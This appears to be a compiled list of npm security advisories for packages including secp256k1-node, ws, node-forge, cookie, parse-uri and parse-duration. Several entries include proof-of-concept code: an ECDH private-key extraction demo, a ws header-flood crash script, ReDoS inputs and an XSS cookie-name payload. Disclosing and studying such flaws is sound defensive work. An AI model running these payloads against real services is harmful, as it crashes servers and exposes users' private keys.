All the vulnerabilities related to the version 0.1.4 of the package
secp256k1-node allows private key extraction over ECDH
In elliptic-based version, loadUncompressedPublicKey has a check that the public key is on the curve: https://github.com/cryptocoinjs/secp256k1-node/blob/6d3474b81d073cc9c8cc8cfadb580c84f8df5248/lib/elliptic.js#L37-L39
loadCompressedPublicKey is, however, missing that check: https://github.com/cryptocoinjs/secp256k1-node/blob/6d3474b81d073cc9c8cc8cfadb580c84f8df5248/lib/elliptic.js#L17-L19
That allows the attacker to use public keys on low-cardinality curves to extract enough information to fully restore the private key from as little as 11 ECDH sessions, and very cheaply on compute power
Other operations on public keys are also affected, including e.g. publicKeyVerify() incorrectly returning true on those invalid keys, and e.g. publicKeyTweakMul() also returning predictable outcomes allowing to restore the tweak
The curve equation is Y^2 = X^3 + 7, and it restores Y from X in loadCompressedPublicKey, using Y = sqrt(X^3 + 7), but when there are no valid Y values satisfying Y^2 = X^3 + 7 for a given X, the same code calculates a solution for -Y^2 = X^3 + 7, and that solution also satisfies some other equation Y^2 = X^3 + D, where D is not equal to 7 and might be on a curve with factorizable cardinality, so (X,Y) might be a low-order point on that curve, lowering the number of possible ECDH output values to bruteforcable
Those output values correspond to remainders which can be then combined with Chinese remainder theorem to restore the original value
Endomorphism-based multiplication only slightly hinders restoration and does not affect the fact that the result is low-order
10 different malicious X values could be chosen so that the overall extracted information is 238.4 bits out of 256 bit private key, and the rest is trivially bruteforcable with an additional 11th public key (which might be valid or not -- not significant)
The attacker does not need to receive the ECDH value, they only need to be able to confirm it against a list of possible candidates, e.g. check if using it to decipher block/stream cipher would work -- and that could all be done locally on the attacker side
This key has order 39 One of the possible outcomes for it is a throw, 38 are predictable ECDH values Keys used in full attack have higher order (starting from ~20000), so are very unlikely to cause an error
import secp256k1 from 'secp256k1/elliptic.js'
import { randomBytes } from 'crypto'
const pub = Buffer.from('028ac57f9c6399282773c116ef21f7394890b6140aa6f25c181e9a91e2a9e3da45', 'hex')
const seen = new Set()
for (let i = 0; i < 1000; i++) {
try {
seen.add(Buffer.from(secp256k1.ecdh(pub, randomBytes(32))).toString('hex'))
} catch {
seen.add('failure also is an outcome')
}
}
console.log(seen.size) // 39
This PoC doesn't list the exact public keys or the code for solver.js intentionally, but this exact code works, on arbitrary random private keys:
// Only the elliptic version is affected, gyp one isn't
// Node.js can use both, Web/RN/bundles always use the elliptic version
import secp256k1 from 'secp256k1/elliptic.js'
import { randomBytes } from 'node:crypto'
import assert from 'node:assert/strict'
import { Solver } from './solver.js'
const privateKey = randomBytes(32)
// The full dataset is precomputed on a single MacBook Air in a few days and can be reused for any private key
const solver = new Solver
// We need to run on 10 specially crafted public keys for this
// Lower than 10 is possible but requires more compute
for (let i = 0; i < 10; i++) {
const letMeIn = solver.ping() // this is a normal 33-byte Uint8Array, a 02/03-prefixed compressed public key
assert(letMeIn instanceof Uint8Array) // true
assert(secp256k1.publicKeyVerify(letMeIn)) // true
// Returning ecdh value is not necessary but is used in this demo for simplicity
// Solver needs to _confirm_ an ecdh value against a set of precalculated known ones,
// which can be done even after it's hashed or used e.g. for a stream/block cipher, based on the encrypted data
solver.callback(secp256k1.ecdh(letMeIn, privateKey))
// Btw we have those precomputed so we can actually use those sessions to lower suspicion, most -- instantly
}
// Now, we need a single valid (or another invalid) public key to recheck things against
// It can be anything, e.g. we can specify an 11th one, or create a valid one and use it
// We'll be able to confirm/restore and use the ecdh value for this session too upon privateKey extraction
const anyPublicKey = secp256k1.publicKeyCreate(randomBytes(32))
assert(secp256k1.publicKeyVerify(anyPublicKey)) // true (obviously)
// Full complexity of this exploit requires solver to perform ~ 2^35 ecdh value checks (for all 10 keys combined),
// which is ~ 1 TiB -- that can be done offline and does not require any further interaction with the target
// The exact speed of the comparison step depends on how the ecdh values are used, but is not very significant
// Direct non-indexed linear scan over all possible (precomputed) values takes <10 minutes on a MacBook Air
// Confirming against e.g. cipher output would be somewhat slower, but still definitely possible + also could be precomputed
const extracted = solver.stab(anyPublicKey, secp256k1.ecdh(anyPublicKey, privateKey))
console.log(`Extracted private key: ${extracted.toString('hex')}`)
console.log(`Actual private key was: ${privateKey.toString('hex')}`)
assert(extracted.toString('hex') === privateKey.toString('hex'))
console.log('Oops')
Result:
Extracted private key: e3370b1e6726a6ceaa51a2aacf419e25244e0cde08596780da021b238b74df3d
Actual private key was: e3370b1e6726a6ceaa51a2aacf419e25244e0cde08596780da021b238b74df3d
Oops
node example.js 178.80s user 13.59s system 74% cpu 4:17.01 total
Remote private key is extracted over 11 ECDH sessions
The attack is very low-cost, precompute took a few days on a single MacBook Air, and extraction takes ~10 minutes on the same MacBook Air
Also:
publicKeyVerify() misreports malicious public keys as validpublicKeyTweakMul result and other public key operationsws affected by a DoS when handling a request with many HTTP headers
A request with a number of headers exceeding theserver.maxHeadersCount threshold could be used to crash a ws server.
const http = require('http');
const WebSocket = require('ws');
const wss = new WebSocket.Server({ port: 0 }, function () {
const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
const headers = {};
let count = 0;
for (let i = 0; i < chars.length; i++) {
if (count === 2000) break;
for (let j = 0; j < chars.length; j++) {
const key = chars[i] + chars[j];
headers[key] = 'x';
if (++count === 2000) break;
}
}
headers.Connection = 'Upgrade';
headers.Upgrade = 'websocket';
headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
headers['Sec-WebSocket-Version'] = '13';
const request = http.request({
headers: headers,
host: '127.0.0.1',
port: wss.address().port
});
request.end();
});
The vulnerability was fixed in ws@8.17.1 (https://github.com/websockets/ws/commit/e55e5106f10fcbaac37cfa89759e4cc0d073a52c) and backported to ws@7.5.10 (https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f), ws@6.2.3 (https://github.com/websockets/ws/commit/eeb76d313e2a00dd5247ca3597bba7877d064a63), and ws@5.2.4 (https://github.com/websockets/ws/commit/4abd8f6de4b0b65ef80b3ff081989479ed93377e)
In vulnerable versions of ws, the issue can be mitigated in the following ways:
--max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent.server.maxHeadersCount to 0 so that no limit is applied.The vulnerability was reported by Ryan LaPointe in https://github.com/websockets/ws/issues/2230.
jsondiffpatch is vulnerable to Cross-site Scripting (XSS) via HtmlFormatter::nodeBegin
Versions of jsondiffpatch prior to 0.7.2 are vulnerable to Cross-site Scripting (XSS) in the HtmlFormatter (HtmlFormatter::nodeBegin). When diffs are rendered to HTML using the built-in formatter, untrusted payloads can inject scripts and execute in the context of a consuming web page.
Affected versions: >= 0, < 0.7.2 Patched version: 0.7.2
Remediation
Upgrade to jsondiffpatch 0.7.2 or later. The fix hardens the HTML formatter to avoid script injection.
Workarounds Avoid using the HTML formatter on untrusted diffs, or sanitize/escape the rendered output.
Improper Verification of Cryptographic Signature in node-forge
RSA PKCS#1 v1.5 signature verification code is not properly checking DigestInfo for a proper ASN.1 structure. This can lead to successful verification with signatures that contain invalid structures but a valid digest.
The issue has been addressed in node-forge 1.3.0.
If you have any questions or comments about this advisory:
node-forge has ASN.1 Unbounded Recursion
An Uncontrolled Recursion (CWE-674) vulnerability in node-forge versions 1.3.1 and below enables remote, unauthenticated attackers to craft deep ASN.1 structures that trigger unbounded recursive parsing. This leads to a Denial-of-Service (DoS) via stack exhaustion when parsing untrusted DER inputs.
An ASN.1 Denial of Service (Dos) vulnerability exists in the node-forge asn1.fromDer function within forge/lib/asn1.js. The ASN.1 DER parser implementation (_fromDer) recurses for every constructed ASN.1 value (SEQUENCE, SET, etc.) and lacks a guard limiting recursion depth. An attacker can craft a small DER blob containing a very large nesting depth of constructed TLVs which causes the Node.js V8 engine to exhaust its call stack and throw RangeError: Maximum call stack size exceeded, crashing or incapacitating the process handling the parse. This is a remote, low-cost Denial-of-Service against applications that parse untrusted ASN.1 objects.
This vulnerability enables an unauthenticated attacker to reliably crash a server or client using node-forge for TLS connections or certificate parsing.
This vulnerability impacts the ans1.fromDer function in node-forge before patched version 1.3.2.
Any downstream application using this component is impacted. These components may be leveraged by downstream applications in ways that enable full compromise of availability.
node-forge has an Interpretation Conflict vulnerability via its ASN.1 Validator Desynchronization
CVE-2025-12816 has been reserved by CERT/CC
Description An Interpretation Conflict (CWE-436) vulnerability in node-forge versions 1.3.1 and below enables remote, unauthenticated attackers to craft ASN.1 structures to desynchronize schema validations, yielding a semantic divergence that may bypass downstream cryptographic verifications and security decisions.
A critical ASN.1 validation bypass vulnerability exists in the node-forge asn1.validate function within forge/lib/asn1.js. ASN.1 is a schema language that defines data structures, like the typed record schemas used in X.509, PKCS#7, PKCS#12, etc. DER (Distinguished Encoding Rules), a strict binary encoding of ASN.1, is what cryptographic code expects when verifying signatures, and the exact bytes and structure must match the schema used to compute and verify the signature. After deserializing DER, Forge uses static ASN.1 validation schemas to locate the signed data or public key, compute digests over the exact bytes required, and feed digest and signature fields into cryptographic primitives.
This vulnerability allows a specially crafted ASN.1 object to desynchronize the validator on optional boundaries, causing a malformed optional field to be semantically reinterpreted as the subsequent mandatory structure. This manifests as logic bypasses in cryptographic algorithms and protocols with optional security features (such as PKCS#12, where MACs are treated as absent) and semantic interpretation conflicts in strict protocols (such as X.509, where fields are read as the wrong type).
This flaw allows an attacker to desynchronize the validator, allowing critical components like digital signatures or integrity checks to be skipped or validated against attacker-controlled data.
This vulnerability impacts the ans1.validate function in node-forge before patched version 1.3.2.
https://github.com/digitalbazaar/forge/blob/main/lib/asn1.js.
The following components in node-forge are impacted.
lib/asn1.js
lib/x509.js
lib/pkcs12.js
lib/pkcs7.js
lib/rsa.js
lib/pbe.js
lib/ed25519.js
Any downstream application using these components is impacted.
These components may be leveraged by downstream applications in ways that enable full compromise of integrity, leading to potential availability and confidentiality compromises.
Prototype Pollution in node-forge debug API.
The forge.debug API had a potential prototype pollution issue if called with untrusted input. The API was only used for internal debug purposes in a safe way and never documented or advertised. It is suspected that uses of this API, if any exist, would likely not have used untrusted inputs in a vulnerable way.
The forge.debug API and related functions were removed in 1.0.0.
Don't use the forge.debug API directly or indirectly with untrusted input.
If you have any questions or comments about this advisory:
node-forge is vulnerable to ASN.1 OID Integer Truncation
MITRE-Formatted CVE Description An Integer Overflow (CWE-190) vulnerability in node-forge versions 1.3.1 and below enables remote, unauthenticated attackers to craft ASN.1 structures containing OIDs with oversized arcs. These arcs may be decoded as smaller, trusted OIDs due to 32-bit bitwise truncation, enabling the bypass of downstream OID-based security decisions.
An ASN.1 OID Integer Truncation vulnerability exists in the node-forge asn1.derToOid function within forge/lib/asn1.js. OID components are decoded using JavaScript's bitwise left-shift operator (<<), which forcibly casts values to 32-bit signed integers. Consequently, if an attacker provides a mathematically unique, very large OID arc integer exceeding $2^{31}-1$, the value silently overflows and wraps around rather than throwing an error.
This vulnerability allows a specially crafted ASN.1 object to spoof an OID, where a malicious certificate with a massive, invalid OID is misinterpreted by the library as a trusted, standard OID, potentially bypassing security controls.
This vulnerability impacts the asn1.derToOid function in node-forge before patched version 1.3.2.
Any downstream application using this component is impacted. This component may be leveraged by downstream applications in ways that enables partial compromise of integrity, leading to potential availability and confidentiality compromises.
Open Redirect in node-forge
parseUrl functionality in node-forge mishandles certain uses of backslash such as https:/\/\/\ and interprets the URI as a relative path.
Prototype Pollution in node-forge
The package node-forge before 0.10.0 is vulnerable to Prototype Pollution via the util.setPath function. Note: version 0.10.0 is a breaking change removing the vulnerable functions.
Improper Verification of Cryptographic Signature in node-forge
RSA PKCS#1 v1.5 signature verification code is lenient in checking the digest algorithm structure. This can allow a crafted structure that steals padding bytes and uses unchecked portion of the PKCS#1 encoded message to forge a signature when a low public exponent is being used.
The issue has been addressed in node-forge 1.3.0.
For more information, please see "Bleichenbacher's RSA signature forgery based on implementation error" by Hal Finney.
If you have any questions or comments about this advisory:
URL parsing in node-forge could lead to undesired behavior.
The regex used for the forge.util.parseUrl API would not properly parse certain inputs resulting in a parsed data structure that could lead to undesired behavior.
forge.util.parseUrl and other very old related URL APIs were removed in 1.0.0 in favor of letting applications use the more modern WHATWG URL Standard API.
Ensure code does not directly or indirectly call forge.util.parseUrl with untrusted input.
If you have any questions or comments about this advisory:
Prototype Pollution in node-forge util.setPath API
forge.util.setPath had a potential prototype pollution issue if called with untrusted keys. This API was not used by forge itself.
The forge.util.setPath API and related functions were removed in 0.10.0.
Don't call forge.util.setPath directly or indirectly with untrusted keys.
If you have any questions or comments about this advisory:
Improper Verification of Cryptographic Signature in node-forge
RSA PKCS#1 v1.5 signature verification code does not check for tailing garbage bytes after decoding a DigestInfo ASN.1 structure. This can allow padding bytes to be removed and garbage data added to forge a signature when a low public exponent is being used.
The issue has been addressed in node-forge 1.3.0.
For more information, please see "Bleichenbacher's RSA signature forgery based on implementation error" by Hal Finney.
If you have any questions or comments about this advisory:
libp2p DoS vulnerability from lack of resource management
Versions older than v0.38.0 of js-libp2p are vulnerable to targeted resource exhaustion attacks. These attacks target libp2p’s connection, stream, peer, and memory management. An attacker can cause the allocation of large amounts of memory, ultimately leading to the process getting killed by the host’s operating system. While a connection manager tasked with keeping the number of connections within manageable limits has been part of js-libp2p, this component was designed to handle the regular churn of peers, not a targeted resource exhaustion attack.
Update your js-libp2p dependency to v0.38.0 or greater.
There are no workarounds, and so we recommend to upgrade your js-libp2p version. Some range of attacks can be mitigated using OS tools (like manually blocking malicious peers using iptables or ufw ) or making use of a load balancer in front of libp2p nodes. You can also use the allow deny list in js-libp2p to deny specific peers.
However these require direct action & responsibility on your part and are no substitutes for upgrading js-libp2p. Therefore, we highly recommend upgrading your js-libp2p version for the way it enables tighter scoped limits and provides visibility into and easier reasoning about js-libp2p resource utilization.
Please see the related disclosure for go-libp2p: https://github.com/libp2p/go-libp2p/security/advisories/GHSA-j7qp-mfxf-8xjw and rust-libp2p: https://github.com/libp2p/rust-libp2p/security/advisories/GHSA-jvgw-gccv-q5p8
If you have any questions or comments about this advisory, please email us at security@libp2p.io.
private-ip vulnerable to Server-Side Request Forgery
All versions of the package private-ip are vulnerable to Server-Side Request Forgery (SSRF), where an attacker can provide an IP or hostname that resolves to a multicast IP address (224.0.0.0/4) which is not included as part of the private IP ranges in the package's source code.
cookie accepts cookie name, path, and domain with out of bounds characters
The cookie name could be used to set other fields of the cookie, resulting in an unexpected cookie value. For example, serialize("userName=<script>alert('XSS3')</script>; Max-Age=2592000; a", value) would result in "userName=<script>alert('XSS3')</script>; Max-Age=2592000; a=test", setting userName cookie to <script> and ignoring value.
A similar escape can be used for path and domain, which could be abused to alter other fields of the cookie.
Upgrade to 0.7.0, which updates the validation for name, path, and domain.
Avoid passing untrusted or arbitrary values for these fields, ensure they are set by the application instead of user input.
parse-uri Regular expression Denial of Service (ReDoS)
An issue in parse-uri v1.0.9 allows attackers to cause a Regular expression Denial of Service (ReDoS) via a crafted URL.
async function exploit() {
const parseuri = require("parse-uri");
// This input is designed to cause excessive backtracking in the regex
const craftedInput = 'http://example.com/' + 'a'.repeat(30000) + '?key=value';
const result = await parseuri(craftedInput);
}
await exploit();
Got allows a redirect to a UNIX socket
The got package before 11.8.5 and 12.1.0 for Node.js allows a redirect to a UNIX socket.
parse-duration has a Regex Denial of Service that results in event loop delay and out of memory
This report finds 2 availability issues due to the regex used in the parse-duration npm package:
Refer to the following proof of concept code that provides a test case and makes use of the regular expression in the library as its test case to match against strings:
// Vulnerable regex to use from the library:
import parse from './index.js'
function generateStressTestString(length, decimalProbability) {
let result = "";
for (let i = 0; i < length; i++) {
if (Math.random() < decimalProbability) {
result += "....".repeat(99);
}
result += Math.floor(Math.random() * 10);
}
return result;
}
function getStringSizeInMB_UTF8(str) {
const sizeInBytes = Buffer.byteLength(str, 'utf8');
const sizeInMB = sizeInBytes / (1024 * 1024);
return sizeInMB;
}
// Generate test strings with varying length and decimal probability:
const longString1 = generateStressTestString(380, 0.05);
const longString2 = generateStressTestString(10000, 0.9);
const longString3 = generateStressTestString(500000, 1);
const longStringVar1 = '-1e' + '-----'.repeat(915000)
const longStringVar2 = "1" + "0".repeat(500) + "e1" + "α".repeat(5225000)
function testRegex(str) {
const startTime = performance.now();
// one of the regex's used in the library:
// const durationRE = /(-?(?:\d+\.?\d*|\d*\.?\d+)(?:e[-+]?\d+)?)\s*([\p{L}]*)/giu;
// const match = durationRE.test(str);
// but we will use the exported library code directly:
const match = parse(str);
const endTime = performance.now();
const timeTaken = endTime - startTime;
return { timeTaken, match };
}
// Test the long strings:
let result = {}
{
console.log(
`\nRegex test on string of length ${longString1.length} (size: ${getStringSizeInMB_UTF8(longString1).toFixed(2)} MB):`
);
result = testRegex(longString1);
console.log(
` matched: ${result.match}, time taken: ${result.timeTaken}ms`
);
}
{
console.log(
`\nRegex test on string of length ${longString2.length} (size: ${getStringSizeInMB_UTF8(longString2).toFixed(2)} MB):`
);
result = testRegex(longString2 + "....".repeat(100) + "5сек".repeat(9000));
console.log(
` matched: ${result.match}, time taken: ${result.timeTaken}ms`
);
}
{
console.log(
`\nRegex test on string of length ${longStringVar1.length} (size: ${getStringSizeInMB_UTF8(longStringVar1).toFixed(2)} MB):`
);
result = testRegex(longStringVar1);
console.log(
` matched: ${result.match}, time taken: ${result.timeTaken}ms`
);
}
{
console.log(
`\nRegex test on string of length ${longString3.length} (size: ${getStringSizeInMB_UTF8(longString3).toFixed(2)} MB):`
);
result = testRegex(longString3 + '.'.repeat(10000) + " 5сек".repeat(9000));
console.log(
` matched: ${result.match}, time taken: ${result.timeTaken}ms`
);
}
{
console.log(
`\nRegex test on string of length ${longStringVar2.length} (size: ${getStringSizeInMB_UTF8(longStringVar2).toFixed(2)} MB):`
);
result = testRegex(longStringVar2);
console.log(
` matched: ${result.match}, time taken: ${result.timeTaken}ms`
);
}
The results of this on the cloud machine that I ran this on are as follows:
@lirantal ➜ /workspaces/parse-duration (master) $ node redos.js
Regex test on string of length 6320 (size: 0.01 MB):
matched: 5997140778.000855, time taken: 0.9271340000000237ms
Regex test on string of length 3561724 (size: 3.40 MB):
matched: 0.0006004999999999999, time taken: 728.7693149999999ms
Regex test on string of length 4575003 (size: 4.36 MB):
matched: null, time taken: 43.713984999999866ms
Regex test on string of length 198500000 (size: 189.30 MB):
<--- Last few GCs --->
[34339:0x7686430] 14670 ms: Mark-Compact (reduce) 2047.4 (2073.3) -> 2047.4 (2074.3) MB, 1396.70 / 0.01 ms (+ 0.1 ms in 62 steps since start of marking, biggest step 0.0 ms, walltime since start of marking 1430 ms) (average mu = 0.412, current mu = 0.[34339:0x7686430] 17450 ms: Mark-Compact (reduce) 2048.4 (2074.3) -> 2048.4 (2075.3) MB, 2777.68 / 0.00 ms (average mu = 0.185, current mu = 0.001) allocation failure; scavenge might not succeed
<--- JS stacktrace --->
FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
----- Native stack trace -----
1: 0xb8d0a3 node::OOMErrorHandler(char const*, v8::OOMDetails const&) [node]
2: 0xf06250 v8::Utils::ReportOOMFailure(v8::internal::Isolate*, char const*, v8::OOMDetails const&) [node]
3: 0xf06537 v8::internal::V8::FatalProcessOutOfMemory(v8::internal::Isolate*, char const*, v8::OOMDetails const&) [node]
4: 0x11180d5 [node]
5: 0x112ff58 v8::internal::Heap::CollectGarbage(v8::internal::AllocationSpace, v8::internal::GarbageCollectionReason, v8::GCCallbackFlags) [node]
6: 0x1106071 v8::internal::HeapAllocator::AllocateRawWithLightRetrySlowPath(int, v8::internal::AllocationType, v8::internal::AllocationOrigin, v8::internal::AllocationAlignment) [node]
7: 0x1107205 v8::internal::HeapAllocator::AllocateRawWithRetryOrFailSlowPath(int, v8::internal::AllocationType, v8::internal::AllocationOrigin, v8::internal::AllocationAlignment) [node]
8: 0x10e4856 v8::internal::Factory::NewFillerObject(int, v8::internal::AllocationAlignment, v8::internal::AllocationType, v8::internal::AllocationOrigin) [node]
9: 0x1540686 v8::internal::Runtime_AllocateInYoungGeneration(int, unsigned long*, v8::internal::Isolate*) [node]
10: 0x1979ef6 [node]
Aborted (core dumped)
You can note that:
parse() functionHowever, more interestingly, if we focus on the input string case:
const longStringVar2 = "1" + "0".repeat(500) + "e1" + "α".repeat(5225000)
Even though this is merely 10 MB of size (9.97 MB) it results in an out of memory issue due to the recursive nature of the regular expression matching:
Regex test on string of length 5225503 (size: 9.97 MB):
file:///workspaces/parse-duration/index.js:21
.replace(durationRE, (_, n, units) => {
^
RangeError: Maximum call stack size exceeded
at String.replace (<anonymous>)
at parse (file:///workspaces/parse-duration/index.js:21:6)
at testRegex (file:///workspaces/parse-duration/redos.js:35:17)
at file:///workspaces/parse-duration/redos.js:89:12
at ModuleJob.run (node:internal/modules/esm/module_job:234:25)
at async ModuleLoader.import (node:internal/modules/esm/loader:473:24)
at async asyncRunEntryPointWithESMLoader (node:internal/modules/run_main:122:5)
Node.js v20.18.1
To note, the issue at hand may not just be the primary regex in use but rather the reliance of the various replace functions in the parse() function which create copies of the input in memory.